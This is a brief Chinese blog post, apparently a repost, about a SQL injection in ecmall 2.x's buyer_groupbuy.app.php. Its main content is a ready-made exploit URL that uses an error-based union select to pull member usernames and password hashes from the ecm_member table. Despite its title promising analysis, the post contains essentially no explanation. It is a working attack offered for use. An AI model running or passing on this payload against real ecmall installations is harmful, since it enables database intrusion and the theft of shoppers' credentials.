ecmall 2.x通杀SQL注入漏洞分析及利用 附EXP

作者:Chora
漏洞文件app/buyer_groupbuy.app.php

 

利用方法:http://localhost/ecmall/index.php?app=buyer_groupbuy&act=exit_group&id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b

 

EXP from Seay

 

[/crayon]

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录